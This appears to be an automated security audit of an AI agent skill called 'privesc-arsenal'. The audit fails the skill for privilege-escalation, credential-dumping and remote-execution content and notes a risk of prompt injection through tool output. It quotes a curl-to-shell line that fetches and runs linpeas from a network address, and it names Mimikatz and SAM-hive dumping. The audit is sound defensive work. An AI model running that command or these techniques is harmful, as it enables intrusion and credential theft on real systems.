privesc-arsenal

Fail

Audited by Gen Agent Trust Hub on Sep 20, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONPRIVILEGE_ESCALATIONDATA_EXFILTRATIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides commands for downloading and immediately executing scripts from a remote network address, specifically using piped execution patterns (e.g., curl 10.10.14.5:8000/linpeas.sh | sh). It also details methods for downloading and running binaries on Windows using certutil and PowerShell Invoke-WebRequest.
  • [COMMAND_EXECUTION]: The skill instructs the agent to perform a wide variety of high-risk shell commands for system modification, including SUID/SGID manipulation, cron job injection, and hijacking execution via PATH or library shadowing (LD_PRELOAD).
  • [PRIVILEGE_ESCALATION]: The core functionality of the skill is designed to guide an agent from initial access to full administrative or root control. It covers kernel exploits, token impersonation (Potato attacks), and service permission abuse.
  • [DATA_EXFILTRATION]: The instructions include procedures for harvesting sensitive system credentials, such as saving and dumping Windows SAM and SYSTEM hives to extract account hashes, and using Mimikatz for logon password recovery.
  • [INDIRECT_PROMPT_INJECTION]: The skill creates a significant attack surface for indirect prompt injection by having the agent process output from various system enumeration tools that may ingest untrusted content.
  • Ingestion points: Instructions for the agent to analyze results from scripts like linpeas.sh, winPEAS, pspy, and linux-exploit-suggester within SKILL.md.
  • Boundary markers: None provided to separate tool output from instructions.
  • Capability inventory: The skill possesses capabilities for remote code execution, credential dumping, and administrative system changes across all files.
  • Sanitization: No sanitization or validation mechanisms are described for the data processed by the agent.
Recommendations
  • HIGH: Downloads and executes remote code from: http://10.10.14.5:8000/linpeas.sh` - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 20, 2026, 11:02 PM
Security Audit — agent-trust-hub — privesc-arsenal